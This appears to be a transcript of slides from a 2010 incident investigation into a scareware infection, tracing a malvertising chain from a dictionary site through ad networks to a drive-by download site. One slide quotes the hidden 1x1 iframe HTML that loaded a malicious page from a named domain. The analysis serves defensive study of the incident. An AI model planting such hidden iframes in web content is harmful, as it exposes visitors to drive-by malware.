infected pc investigation summary
DESCRIPTION
Infected PC Investigation Summary. 6/8/10 infection. The story you are about to hear is true. Only the names have been changed to protect the innocent. Hello, - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/1.jpg)
Infected PC Investigation Summary
6/8/10 infection
![Page 2: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/2.jpg)
The story you are about to hear is true.
Only the names have been changed to
protect the innocent.
![Page 3: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/3.jpg)
![Page 4: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/4.jpg)
Hello,A user’s pc has been infected with a rogue antispyware called AV security Suite, keeps coming up with bogus viruses and basically has taken over the system. The network has been disconnected, the incident started yesterday 6/08/10, around 4:25 pm. User has access to level 2 protected info, but does not keep any of that info on her pc.Thanks,Tech Guy
![Page 5: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/5.jpg)
• User visited legitimate, medical-dictionary.thefreedictionary.com
• Site served up advertising through interclick.com• One of the advertising pulls came from a known
"Malvertising" domain h7.ch.adtech.com.niklip.com. Malvertising domains serve up obfuscated JavaScript that redirects browsers to malware “check-in” sites.
![Page 6: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/6.jpg)
• Immediately after this pull, a request was made to a known malware "check-in” site statsoplex.co.cc which returned a hidden iframe. Malware check-in sites redirect browsers to SEO (Search Engine Optimization) Exploit drive-by sites.
![Page 7: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/7.jpg)
The iframe
<html><body><iframe src="http://aiosstatsungenett.com/info/nag3.html" style="visibility:hidden;" width="1" height="1"></iframe></body></html>
![Page 8: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/8.jpg)
• The iframe loaded a scareware A/V page from a known SEO Exploit drive-by site, aiosstatsungenett.com. The scareware page, nag3.html, was loaded with obfuscated malware JavaScript.
![Page 9: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/9.jpg)
• Two seconds later, the JavaScript that came from aiosstatsungenett.com initiated a 289K application stream to the browser from 188.65.x.x. The application stream turned out to be an infected SWF. An infected PDF was also downloaded.
![Page 10: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/10.jpg)
The Malware Distribution Site
• Reverse lookup on 188.65.x.x
• protect-ware.com
• "Antispyware Soft - Powerfull PC Protection !"
![Page 11: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/11.jpg)
Interesting factoid
• All 4 of the above domains were registered within a month of the infection via a Chinese registrar, todaynic.com.
• Registrant addresses were in Lithuania, Russia, and Pennsylvania.
• IP addresses were in Austria, Belgium, Sweden
![Page 12: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/12.jpg)
Another interesting factoid
• Study by Avast! (A/V software) found that for every 1 infected adult site there were 99 other legitimate sites that were infected.
![Page 13: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/13.jpg)
Sites that are known to have been referring clients to malicious advertising services related to this incident
![Page 14: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/14.jpg)
The PC
• XP SP3, fully patched• McAfee 8.7 with current engine and
signatures• Updated Adobe Reader
![Page 15: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/15.jpg)
The Malware
• All JavaScript was obfuscated• The Payload was downloaded without user
interaction• Primarily scareware – attempted to convince
the user that Antivirus Soft could disinfect and protect her PC
• Pretty convincing Product image and System Tray icon. Would have fooled most users.
![Page 16: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/16.jpg)
The Malware
• When the malware was uploaded to virustotal.com, only 3/41 products detected (McAfee did not detect)
• Next day, detection rate increased to 19/41, this time including McAfee
![Page 17: Infected PC Investigation Summary](https://reader036.vdocuments.mx/reader036/viewer/2022062518/568143c7550346895db0549b/html5/thumbnails/17.jpg)
Results
• No indication from firewall logs that this was anything more than an attempt to get the user to buy useless, and likely infected, software
• PC was wiped, reloaded, and returned to the user